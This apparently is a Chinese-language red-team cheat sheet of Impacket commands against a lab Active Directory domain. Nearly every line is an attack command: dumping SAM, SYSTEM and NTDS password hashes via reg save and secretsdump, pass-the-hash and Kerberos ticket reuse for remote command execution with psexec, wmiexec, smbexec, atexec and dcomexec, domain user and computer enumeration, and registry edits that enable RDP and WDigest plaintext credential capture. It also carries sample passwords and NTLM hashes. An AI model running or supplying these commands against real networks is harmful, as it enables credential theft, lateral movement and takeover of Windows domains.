workgroup = ./Administrator
Domain = offensive/Administrator

impacket-secretsdump

DC域控导出域内hash
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
secretsdump.exe -sam sam.hiv -security security.hiv -system system.hiv LOCAL

DC导出域内所有用户hash
reg save HKLM\SYSTEM system.hiv
secretsdump.exe -system system.hiv -ntds ntds.dit LOCAL

secretsdump 查看域内所有用户hash

impacket-secretsdump offensive/Administrator:Admin12345@offensive.local -dc-ip 192.168.3.110

secretsdump 查看域内所有用户hash

impacket-secretsdump -hashes :ccef208c6485269c20db2cad21734fe7 offensive/Administrator@offensive.local -dc-ip 192.168.3.110

secretsdump查看Administrator用户hash

impacket-psexec 票据传递

impacket-getTGT -hashes :ccef208c6485269c20db2cad21734fe7 offensive.local/administrator


export KRB5CCNAME=administrator.ccache
impacket-psexec offensive.local/Administrator@DC.offensive.local -k -no-pass -codec gbk

impacket-psexec 命令执行

impacket-psexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk

impacket-psexec pth命令执行

impacket-psexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk

impacket-wmiexec 命令执行

impacket-wmiexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk

impacket-wmiexec pth命令执行

impacket-wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk

impacket-atexec 命令执行

impacket-atexec offensive/administrator:Admin12345@192.168.3.110 "whoami /user" -codec gbk

impacket-smbexec 命令执行

impacket-smbexec offensive/administrator:Admin12345@192.168.3.110 -codec gbk

impacket-smbexec pth命令执行

impacket-smbexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk

impacket-dcomexec 命令执行

impacket-dcomexec offensive/administrator:Admin12345@192.168.3.110 -codec gbk

impacket-dcomexec -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110 "whoami /user" -codec gbk

impacket-lookupsid-查看用户sid

impacket-lookupsid -hashes :ccef208c6485269c20db2cad21734fe7 offensive/administrator@192.168.3.110

impacket-GetADUsers-查询所有用户

impacket-GetADUsers -all offensive.local/Administrator:Admin12345 -dc-ip 192.168.3.110

impacket-GetADUsers-查询所有计算机

impacket-GetADComputers offensive.local/Administrator:Admin12345 -dc-ip 192.168.3.110

impacket-reg 查看注册表信息

  • 查看3389端口
impacket-reg offensive/administrator:Admin12345@192.168.3.173 query -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -v "PortNumber"

  • 开启3389
impacket-reg offensive/administrator:Admin12345@192.168.3.173 add -keyName "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v fDenyTSConnections -vt REG_DWORD -vd 0

  • 开启抓取明文
impacket-reg ./Administrator@192.168.3.173 -hashes ':ccef208c6485269c20db2cad21734fe7' add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -v 'UseLogonCredential' -vt 'REG_DWORD' -vd '1'

impacket报错问题

[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839